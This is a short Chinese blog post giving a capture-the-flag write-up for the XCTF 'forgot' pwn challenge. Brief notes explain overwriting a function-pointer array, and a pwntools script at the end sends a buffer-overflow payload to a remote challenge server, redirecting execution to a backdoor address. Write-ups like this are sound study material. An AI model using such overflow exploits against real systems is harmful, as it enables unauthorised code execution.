刘功瑞的博客

有一天你突然惊醒,发现这一切,都只不过是一场梦。

攻防世界 XCTF Pwn forgot(函数数组)

image.png


代码流程

image.png


溢出位置

image.png

可利用的地址, v3相当于一个函数数组,v14是数组的角标

v3数组的内容

image.png


image.png

我们想办法覆盖第一个函数,并确保v14的值不会改变 0x80486CC为预留的后门函数,覆盖v3为 0x80486CC即可

image.png

from pwn import *
#context.log_level = 'debug'
r = remote("220.249.52.133", 54899)
#r = process("./forgot")
r.recvuntil("What is your name?")
r.sendline("1")
r.recvuntil("Enter the string to be validate")
r.sendline("A"*(0x74-0x54)+p32(0x80486CC))
r.interactive()


发表评论:

Powered By Z-BlogPHP 1.5.2 Zero

Copyright www.liugongrui.com.All Rights Reserved.